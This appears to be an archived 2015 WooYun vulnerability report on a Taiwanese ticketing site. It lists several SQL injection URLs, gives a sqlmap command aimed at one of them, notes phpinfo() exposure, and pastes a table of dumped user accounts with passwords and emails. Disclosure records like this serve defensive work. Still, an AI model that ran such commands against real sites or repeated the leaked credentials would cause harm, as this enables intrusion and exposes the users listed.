乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-02: 细节已通知厂商并且等待厂商处理中 2015-07-03: 厂商已经确认,细节仅向厂商公开 2015-07-13: 细节向核心白帽子及相关领域专家公开 2015-07-23: 细节向普通白帽子公开 2015-08-02: 细节向实习白帽子公开 2015-08-17: 细节向公众公开
多处参数存在SQL注射,phpinfo()敏感信息泄露。。
1、多处注入点
注入点http://www.in89.com.tw/news.php?nid=73http://www.in89.com.tw/ticket.php?pid_for_show=4670http://www.in89.com.tw/website_module.php?website_module_classify_sn=34
2、sqlmap(注意参数设置)
sqlmap.py -u "http://www.in89.com.tw/news.php?nid=73" --technique=B --dbs
部分敏感信息
+------------+------------------------------------+-----+--------+----------------------------+------------------------+---------+---------------------------+-------------------------------------------------------------------------------------------------+| id | zip | job | pwd | city | name | title | e_mail | address |+------------+------------------------------------+-----+--------+----------------------------+------------------------+---------+---------------------------+-------------------------------------------------------------------------------------------------+| dennis | \\?b9\\?c5\\?b8q\\?a5\\?ab 600 | 119 | 601008 | \\?b9\\?c5\\?b8q\\?a5\\?ab | DENIS | 2 | [email protected] | DSFSDFSD || mitory | \\?a4\\?a4\\?a4s\\?b0\\?cf 104 | 101 | mitory | \\?a5x\\?a5_\\?a5\\?ab | mitory | 1 | [email protected] | 125 || nico | \\?b4\\?f2\\?a4f\\?b6m 303 | 106 | nico | \\?b7s\\?a6\\?cb\\?bf\\?a4 | 11 | 1 | [email protected] |1111 || noddy | \\?a6\\?e8\\?b0\\?cf 403 | 117 | noddy | \\?a5x\\?a4\\?a4\\?a5\\?ab | noddy | 2 | [email protected] | \\?abn\\?a8\\?ca\\?aaF\\?b8\\?f4\\?a4T\\?acq12\\?b8\\?b9 || noddy2 | \\?a4\\?a4\\?a5\\?bf\\?b0\\?cf 100 | 101 | noddy | \\?a5x\\?a5_\\?a5\\?ab | noddy | 1 | [email protected] | 1234 || rebirth047 | \\?b8U\\?b5\\?d8\\?b0\\?cf 108 | 111 | 640124 | \\?a5x\\?a5_\\?a5\\?ab | \\?aaL\\?b8t\\?b4\\?d1 | <blank> | [email protected] | \\?a5x\\?a5_\\?a5\\?ab\\?aaZ\\?a9\\?f7\\?b5\\?f3\\?a4G\\?acq124\\?b8\\?b95\\?bc\\?d3\\?a4\\?a72 |+------------+------------------------------------+-----+--------+----------------------------+------------------------+---------+---------------------------+-------------------------------------------------------------------------------------------------+
3.phpinfo()信息泄露,还开启了危险模式!!
已证。。
。。
危害等级:高
漏洞Rank:20
确认时间:2015-07-03 11:31
感謝通報!!
暂无